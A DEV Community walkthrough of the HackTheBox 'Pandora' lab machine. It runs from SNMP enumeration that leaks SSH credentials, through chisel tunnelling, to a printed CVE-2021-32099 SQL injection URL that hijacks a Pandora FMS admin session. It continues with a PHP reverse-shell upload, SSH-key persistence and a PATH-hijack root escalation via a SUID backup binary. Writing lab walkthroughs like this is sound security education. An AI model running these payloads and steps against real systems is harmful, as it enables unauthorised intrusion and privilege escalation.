DEV Community

Cover image for HackTheBox Pandora Walkthrough
Krishna
Krishna

Posted on

HackTheBox Pandora Walkthrough

Link to Box => https://app.hackthebox.com/machines/Pandora/

Enumeration

nmap initial scan

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPIYGoHvNFwTTboYexVGcZzbSLJQsxKopZqrHVTeF8oEIu0iqn7E5czwVkxRO/icqaDqM+AB3QQVcZSDaz//XoXsT/NzNIbb9SERrcK/n8n9or4IbXBEtXhRvltS8NABsOTuhiNo/2fdPYCVJ/HyF5YmbmtqUPols6F5y/MK2Yl3eLMOdQQeax4AWSKVAsR+issSZlN2rADIvpboV7YMoo3ktlHKz4hXlX6FWtfDN/ZyokDNNpgBbr7N8zJ87+QfmNuuGgmcZzxhnzJOzihBHIvdIM4oMm4IetfquYm1WKG3s5q70jMFrjp4wCyEVbxY+DcJ54xjqbaNHhVwiSWUZnAyWe4gQGziPdZH2ULY+n3iTze+8E4a6rxN3l38d1r4THoru88G56QESiy/jQ8m5+Ang77rSEaT3Fnr6rnAF5VG1+kiA36rMIwLabnxQbAWnApRX9CHBpMdBj7v8oLhCRn7ZEoPDcD1P2AASdaDJjRMuR52YPDlUSDd8TnI/DFFs=
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNNJGh4HcK3rlrsvCbu0kASt7NLMvAUwB51UnianAKyr9H0UBYZnOkVZhIjDea3F/CxfOQeqLpanqso/EqXcT9w=
|   256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enter fullscreen mode Exit fullscreen mode

Web Server Enum

└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u http://pandora.htb/FUZZ -o ffuf/ffufRaft -of html -ic -r -recursion -recursion-depth 4 -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf

assets                  [Status: 200, Size: 1690, Words: 112, Lines: 21]
index.html              [Status: 200, Size: 33560, Words: 13127, Lines: 908]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
.html                   [Status: 403, Size: 276, Words: 20, Lines: 10]
.php                    [Status: 403, Size: 276, Words: 20, Lines: 10]
                        [Status: 200, Size: 33560, Words: 13127, Lines: 908]
Enter fullscreen mode Exit fullscreen mode

Tried some other wordlists as well. Nothing useful came up.

ffuf subdomain test

ffuf -u http://pandora.htb -H "Host: FUZZ.pandora.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -c -o ffuf/subdomain -of html -fs 33560

EMPTY
Enter fullscreen mode Exit fullscreen mode

nikto -h

nikto -h http://panda.htb/
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 8318, size: 5d23e548bc656, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ /: A Wordpress installation was found.
Enter fullscreen mode Exit fullscreen mode

observations

nmap UDP scan

Scanning UDP as a last resort, since the website is a dead end.

sudo nmap -sUV panda.htb -oN nmap/udpFirst -vv

PORT    STATE SERVICE REASON              VERSION
161/udp open  snmp    udp-response ttl 63 SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: pandora
Enter fullscreen mode Exit fullscreen mode

So we have found an SNMP port. This is possibly a foothold vector. Let's try getting some info.

Using this as a guide => https://medium.com/@minimalist.ascent/enumerating-snmp-servers-with-nmap-89aaf33bce28

└─$ sudo nmap -sUV -p 161 --script=snmp-info pandora.htb
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 02:42 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.047s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 25m05s
Service Info: Host: pandora

└─$ sudo nmap -sUV -p 161 --script=snmp-interfaces pandora.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 02:43 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.046s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-interfaces: 
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Status: up
|     Traffic stats: 142.54 Kb sent, 142.54 Kb received
|   VMware VMXNET3 Ethernet Controller
|     IP address: 10.10.11.136  Netmask: 255.255.254.0
|     MAC address: 00:50:56:b9:3f:d3 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|     Status: up
|_    Traffic stats: 146.13 Kb sent, 165.78 Kb received
Service Info: Host: pandora


└─$ sudo nmap -sUV -p 161 --script=snmp-netstat pandora.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 02:44 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.045s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-netstat: 
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  10.10.11.136:54460   1.1.1.1:53
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.53:53        0.0.0.0:0
|   UDP  0.0.0.0:161          *:*
|_  UDP  127.0.0.53:53        *:*
Service Info: Host: pandora


└─$ sudo nmap -sUV -p 161 --script=snmp-sysdescr pandora.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 02:46 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.046s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 29m2.87s (174287 timeticks)


Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 02:47 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.045s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-processes:
|   849: 
|     Name: sh
|     Path: /bin/sh
|     Params: -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p CENSORED'
|   863: 
|     Name: snmpd
|     Path: /usr/sbin/snmpd
|     Params: -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
|   1103: 
|     Name: host_check
|     Path: /usr/bin/host_check
|     Params: -u daniel -p CENSORED
Enter fullscreen mode Exit fullscreen mode

We may have inadvertently found some credentials. Trying the combo daniel:CENSORED on the SSH port

SUCCESS!! This was way easier than expected

Foothold

User flag is not present in the home directory. Trying to search for it.

daniel@pandora:~$ find / -type f -name user.txt 2>/dev/null 
/home/matt/user.txt

daniel@pandora:/home/matt$ ls -la
total 24
drwxr-xr-x 2 matt matt 4096 Dec  7 15:00 .
drwxr-xr-x 4 root root 4096 Dec  7 14:32 ..
lrwxrwxrwx 1 matt matt    9 Jun 11  2021 .bash_history -> /dev/null
-rw-r--r-- 1 matt matt  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 matt matt 3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 matt matt  807 Feb 25  2020 .profile
-rw-r----- 1 root matt   33 Jan 14 07:17 user.txt
Enter fullscreen mode Exit fullscreen mode

We will have to find a way to pivot to the matt user if we are to get the user flag.

Privesc

While looking for SUID binaries, found this

daniel@pandora:/home/matt$ ls -lh /usr/bin/pandora_backup
-rwsr-x--- 1 root matt 17K Dec  3 15:58 /usr/bin/pandora_backup
Enter fullscreen mode Exit fullscreen mode

Cant really do much with it tho. As we are not the matt user.

Anyway running linpeas.sh now. We are running under daniel, so we dont have a lot of privileges.

linpeas run

Interesting Stuff only.

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034

╔══════════╣ Protections
═╣ Is ASLR enabled? ............... Yes                                                                                                                      
═╣ Is this a virtual machine? ..... Yes (vmware)            

══════════╣ Cleaned processes                                                                                                                               
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
systemd+     528  0.0  0.1  18408  7456 ?        Ss   16:13   0:00 /lib/systemd/systemd-networkd
  └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
root         779  0.0  0.0   6812  2772 ?        Ss   16:13   0:00 /usr/sbin/cron -f
root         797  0.0  0.0   8352  3396 ?        S    16:13   0:00  _ /usr/sbin/CRON -f
root         810  0.0  0.0   2608   548 ?        Ss   16:13   0:00      _ /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p CENSORED'
root        1119  0.0  0.0   2488  1428 ?        S    16:13   0:00          _ /usr/bin/host_check -u daniel -p CENSORED

# What in the world? cap_setuid ??
root         838  0.0  0.7 228068 31468 ?        Ss   16:13   0:01 /usr/sbin/apache2 -k start
www-data    1050  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1051  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1052  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1053  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1054  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1123  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                                                                            
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -  

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                              

╔══════════╣ Users with console
daniel:x:1001:1001::/home/daniel:/bin/bash                                                                                                                   
matt:x:1000:1000:matt:/home/matt:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Useful software
/usr/bin/base64                                                                                                                                              
/usr/bin/curl
/usr/bin/nc
/usr/bin/netcat
/usr/bin/nmap
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ MySQL
mysql  Ver 15.1 Distrib 10.3.32-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2                                                                    

═╣ MySQL connection using default root/root ........... No                                                                                                   
═╣ MySQL connection using root/toor ................... No                                                                                                   
═╣ MySQL connection using root/NOPASS ................. No 

══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Dec  3 12:57 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Dec  3 12:57 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Dec  3 12:56 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 31 Dec  3 12:53 /etc/apache2/sites-enabled/pandora.conf -> ../sites-available/pandora.conf
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
-rw-r--r-- 1 root root 72958 Jun 11  2021 /etc/php/7.4/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72539 Oct  6  2020 /etc/php/7.4/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions                                                                       
tmux 3.0a                                                                                                                                                    

/tmp/tmux-1001
╔══════════╣ Analyzing Backup Manager Files (limit 70)
-rw-r--r-- 1 root root 14844 Mar  4  2020 /usr/share/php/DB/storage.php                                                                                      

-rw-r--r-- 1 matt matt 2222 Jan  3  2020 /var/www/pandora/pandora_console/include/help/en/help_history_database.php
<i>Mysql Example: GRANT ALL PRIVILEGES ON pandora.* TO 'pandora'@'IP' IDENTIFIED BY 'password'</i>
-rw-r--r-- 1 matt matt 2666 Jan  3  2020 /var/www/pandora/pandora_console/include/help/es/help_history_database.php
<i>Mysql Example: GRANT ALL PRIVILEGES ON pandora.* TO 'pandora'@'IP' IDENTIFIED BY 'password'</i>
-rw-r--r-- 1 matt matt 3159 Jan  3  2020 /var/www/pandora/pandora_console/include/help/ja/help_history_database.php
<i>Mysql Example: GRANT ALL PRIVILEGES ON pandora.* TO 'pandora'@'IP' IDENTIFIED BY 'password'</i>

╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation                                      
-rw-r--r-- 1 matt matt 1263 Jan  3  2020 /var/www/pandora/pandora_console/Dockerfile

╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind                                                                          

═══════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════                                                      
                                         ╚═══════════════════╝                                                                                               
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid 
-rwsr-x--- 1 root matt 17K Dec  3 15:58 /usr/bin/pandora_backup (Unknown SUID binary)

╔══════════╣ Backup files (limited 100)
-rwxr-xr-x 1 root root 44071 Nov 21 00:08 /usr/bin/wsrep_sst_mariabackup

╔══════════╣ Searching *password* or *credential* files in home (limit 70)

/var/www/pandora/pandora_console/godmode/groups/credential_store.php
/var/www/pandora/pandora_console/include/functions_credential_store.php
/var/www/pandora/pandora_console/images/user_password.png

Enter fullscreen mode Exit fullscreen mode

Also running LSE. Below are all the things different from the linpeas run

lse run

[!] sof080 Can we write to a gpg-agent socket?............................. yes!
---
/run/user/1001/gnupg/S.gpg-agent
/run/user/1001/gnupg/S.gpg-agent.ssh
/run/user/1001/gnupg/S.gpg-agent.extra
/run/user/1001/gnupg/S.gpg-agent.browser

===================================================================( CVEs )=====                                                                             
[!] cve-2021-4034 Checking for PwnKit vulnerability........................ yes!
---
Vulnerable!
---
[!] cve-2022-25636 Netfilter linux kernel vulnerability.................... yes!
---
5.4.0-91-generic
---
Enter fullscreen mode Exit fullscreen mode

Further Steps

Tried messing around in /var/www/pandora which is the location of a website which hosted at pandora.panda.htb. Just in case added pandora.pandora.htb to /etc/hosts, which had no effect(more on this later). The web dir has matt permissions. So cannot make any changes.

It looks to be an install of Pandora FMS . So if we can get it to spawn a shell, we can a matt user shell.

And then I noticed this.

daniel@pandora:/etc/apache2/sites-available$ cat pandora.conf 
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>
Enter fullscreen mode Exit fullscreen mode

Note the localhost on the first line. This website is only available locally.

daniel@pandora:/etc/apache2/sites-available$ curl -v http://localhost
*   Trying ::1:80...
* TCP_NODELAY set
* Connected to localhost (::1) port 80 (#0)
> GET / HTTP/1.1
> Host: localhost
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 19 May 2022 18:54:29 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Last-Modified: Fri, 11 Jun 2021 14:55:39 GMT
< ETag: "3f-5c47eb370f0c0"
< Accept-Ranges: bytes
< Content-Length: 63
< Content-Type: text/html
< 
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">
Enter fullscreen mode Exit fullscreen mode

This is the content of /var/www/pandora/index.html.

Reverse Port Forwarding to access internal website.

Let's use chisel to create a relay between the two machines. And access it from our local machine, which will make running exploit vulns on the website easier.

NOTE: We can use SSH port forwarding, or use the socat binary present on the machine for this as well(check linpeas useful software list).

daniel@pandora:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:   Ubuntu 20.04.3 LTS
Release:       20.04
Codename:      focal
daniel@pandora:~$ uname -a
Linux pandora 5.4.0-91-generic \#102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Enter fullscreen mode Exit fullscreen mode

Let's get the linux-amd64 executable from the chisel github releases , which we can use on both our machine and the remote one..

# On the remote machine
daniel@pandora:/tmp/exp$ ./chisel server --port 9000 --proxy http://localhost:80
2022/05/19 19:30:40 server: Fingerprint XKMkRmW0yrANxp6Q0gDbxfx20bBU+DZQMNeBAzdlACY=
2022/05/19 19:30:40 server: Reverse proxy enabled
2022/05/19 19:30:40 server: Listening on http://0.0.0.0:9000

Enter fullscreen mode Exit fullscreen mode

Let's try a simple chisel proxy. It soon becomes clear this does not work. The page is all wonky because a lot of HTML on pandora fms index.html is coded this way

<link rel="stylesheet" href="http://localhost/pandora_console/include/styles/common.css" type="text/css" />
<link rel="stylesheet" href="http://localhost/pandora_console/include/styles/menu.css" type="text/css" />
<link rel="stylesheet" href="http://localhost/pandora_console/include/styles/tables.css" type="text/css" />

<script language="javascript" type="text/javascript" src="http://localhost/pandora_console/include/graphs/flot/jquery.flot.js"></script>
<script language="javascript" type="text/javascript" src="http://localhost/pandora_console/include/graphs/flot/jquery.flot.min.js"></script>
<script language="javascript" type="text/javascript" src="http://localhost/pandora_console/include/graphs/flot/jquery.flot.time.js"></script>
Enter fullscreen mode Exit fullscreen mode

We will need to be able to address this website as http://localhost on our local machine.

To accomplish this, we will be using chisel's reverse port forwarding feature.

TO get this to work. the chisel "server" runs on our machine, aka attacker machine in reverse proxy mode. And the chisel "client" runs on the remote machine.

Used this as a guide => https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683

# on local machine
└─$ ./chisel server -p 3477 --reverse -v
2022/05/19 16:33:34 server: Reverse tunnelling enabled
2022/05/19 16:33:34 server: Fingerprint 98Ub3tYzyTENqnEYjejWa46FQehJHQta2rsD2U0voEI=
2022/05/19 16:33:34 server: Listening on http://0.0.0.0:3477
2022/05/19 16:39:01 server: session#1: Handshaking with 10.10.11.136:54540...
2022/05/19 16:39:01 server: session#1: Verifying configuration
2022/05/19 16:39:01 server: session#1: tun: Created
2022/05/19 16:39:01 server: session#1: tun: proxy#R:80=>80: Listening
2022/05/19 16:39:01 server: session#1: tun: Bound proxies
2022/05/19 16:39:01 server: session#1: tun: SSH connected

# on remote machine
daniel@pandora:/tmp/exp$ ./chisel client 10.10.14.26:3477 R:80:127.0.0.1:80/tcp
2022/05/19 20:38:27 client: Connecting to ws://10.10.14.26:3477
2022/05/19 20:38:27 client: Connected (Latency 44.074267ms)

Enter fullscreen mode Exit fullscreen mode

Chisel server on local machine starts in reverse proxy mode, listens in port 3477 for connections.

Chisel client on remote machine connects to our chisel server, with the following config

  • "R" denotes reverse port forward
  • Listen on port 80 on our client machine. Since this is a low number port, we can only do this on our machine(not the remote server)
  • Forward everything from localhost:80 to "127.0.0.1:80" on the remote machine, thereby granting access to the Pandora FMS website.

Once executed, we can go to http://localhost on our machine. And we can see the Pandora FMS login portal.

Pandora FMS Investigation

At the bottom of the page we see v7.0NG.742_FIX_PERL2020

Now if we could only get the uname/pwd directly from the web app.

daniel@pandora:/var/www/pandora/pandora_console/include$ ls -lh config.php
-rw------- 1 matt matt 413 Dec  3 14:06 config.php
Enter fullscreen mode Exit fullscreen mode

Not accessible.

When we try the creds for daniel, we get ERROR: User only can use the API.

Anyway, let's try searching for exploits for this version

CVE-2020-5844 CVE record lists thecybergeek(one of the box creators) as discoverer of the vuln. Also lists the exact same version of Pandora FMS. Exploit script from their github https://github.com/TheCyberGeek/CVE-2020-5844. This is an authenticated RCE bug though.

After looking at the Pandora FMS Vuln List we see three interesting CVEs

  • CVE-2021-32098 as a vulnerability fixed in v743. Allows unauthenticated attackers to perform Phar deserialization.
  • CVE-2021-32099 as a vuln ficed in v743. Also unauthenticated.
  • CVE-2021-32100 "A remote file inclusion vulnerability exists in Artica Pandora FMS 742, exploitable by the lowest privileged user."

A great explanation on these vulns is here, by the folks who discovered it => https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained/

CVE-2021-32099 is A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session. Sounds exactly like what we need.

CVE-2021-32099 unauthenticated session upgrade using SQLi

We will use the link available here => https://github.com/ibnuuby/CVE-2021-32099, and remove port 8000 since we dont need it.

http://localhost/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario%7Cs:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271
Enter fullscreen mode Exit fullscreen mode

Put this in the browser. Reload once and then go back to http://locahost and you will be logged in(because of the insertion of a session cookie taken straight from the DB).

Extra Info: URL-decode of the above URL to see the SQLi being used

http://localhost:8000/pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:"admin";' as data FROM tsessions_php WHERE '1'='1
Enter fullscreen mode Exit fullscreen mode

In the interface, under "Admin Tools" we see a file manager => http://localhost/pandora_console/index.php?sec=gextensions&sec2=godmode/setup/file_manager

Let's use this to upload a PHP webshell. On Kali, this is available at /usr/share/webshells/php/php-reverse-shell.php.

Create dir shell. Upload a file in it as shell.php. And then access it directly. For me it was http://localhost/pandora_console/images/shell/shell.php

And we GOT IT!

└─$ ncat -lnvp 443                
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.11.136.
Ncat: Connection from 10.10.11.136:37958.
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 22:27:10 up  6:13,  2 users,  load average: 0.01, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
daniel   pts/0    10.10.14.26      16:23   37.00s  0.99s  0.99s -bash
daniel   pts/1    tmux(30407).%0   19:29    1:46m  0.88s  0.76s ./chisel client 10.10.14.26:3477 R:80:127.0.0.1:80/tcp
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
matt@pandora:/$ export TERM=xterm-25color
Enter fullscreen mode Exit fullscreen mode

Go get that user flag!

Adding SSH keys, so that we can login using a regular shell and not a clunky reverse shell.

└─$ ssh-keygen -f ./pandora-key -t ecdsa -b 521
Generating public/private ecdsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ./pandora-key
Your public key has been saved in ./pandora-key.pub
...
...
└─$ ll
total 16
-rw------- 1 kali kali  724 May 19 18:42 pandora-key
-rw-r--r-- 1 kali kali  263 May 19 18:42 pandora-key.pub
Enter fullscreen mode Exit fullscreen mode

Append the pandora-key.pub to ~/.ssh/authorized_keys in matt's home folder. And voila! we have ssh login as matt.

└─$ ssh -i pandora-key matt@pandora.htb
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
...
...
matt@pandora:~$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
Enter fullscreen mode Exit fullscreen mode

You can stop the chisel instances now :)

We can finally get the contents of /var/www/pandora/pandora_console/include/config.php.

<?php
// File generated by centos kickstart
$config["dbtype"] = "mysql";
$config["dbname"]="pandora";
$config["dbuser"]="pandora";
$config["dbpass"]="CENSORED";
$config["dbhost"]="localhost";
$config["homedir"]="/var/www/pandora/pandora_console";
$config["homeurl"]="/pandora_console";
error_reporting(0); 
$ownDir = dirname(__FILE__) . '/';
include ($ownDir . "config_process.php");
?>
Enter fullscreen mode Exit fullscreen mode
matt@pandora:~$ mysql -u pandora -p pandora
Enter password:

MariaDB [pandora]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| pandora            |
+--------------------+
MariaDB [pandora]> show tables;
| tpassword_history                  | # Only Interesting table I found

MariaDB [pandora]> select * from tpassword_history;
+---------+---------+----------------------------------+---------------------+---------------------+
| id_pass | id_user | password                         | date_begin          | date_end            |
+---------+---------+----------------------------------+---------------------+---------------------+
|       1 | matt    | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 | 0000-00-00 00:00:00 |
|       2 | daniel  | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 | 0000-00-00 00:00:00 |
+---------+---------+----------------------------------+---------------------+---------------------+
2 rows in set (0.001 sec)
Enter fullscreen mode Exit fullscreen mode

Ran it through crackstation. Nothing useful.

Now, let's try to try to do something with that SUID binary /usr/bin/pandora_backup. Downloading to local system and decompiling with Ghidra gives us the following

bool main(void)

{
  __uid_t __euid;
  __uid_t __ruid;
  int iVar1;

  __euid = getuid();
  __ruid = geteuid();
  setreuid(__ruid,__euid);
  puts("PandoraFMS Backup Utility");
  puts("Now attempting to backup PandoraFMS client");
  iVar1 = system("tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*");
  if (iVar1 == 0) {
    puts("Backup successful!");
    puts("Terminating program!");
  }
  else {
    puts("Backup failed!\nCheck your permissions!");
  }
  return iVar1 != 0;
}

Enter fullscreen mode Exit fullscreen mode

If we could write something in PATH, we can execute a fake tar to get us a root shell.

matt@pandora:~/bin$ which bash
/usr/bin/bash
matt@pandora:~/bin$ echo "/usr/bin/bash -p" > tar
matt@pandora:~/bin$ chmod 777 tar
matt@pandora:~/bin$ export PATH=$PWD:$PATH
matt@pandora:~/bin$ echo $PATH
/home/matt/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:~/bin$ /usr/bin/pandora_backup 
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:~/bin# id
uid=0(root) gid=1000(matt) groups=1000(matt)
Enter fullscreen mode Exit fullscreen mode

Go get that root flag!

Top comments (0)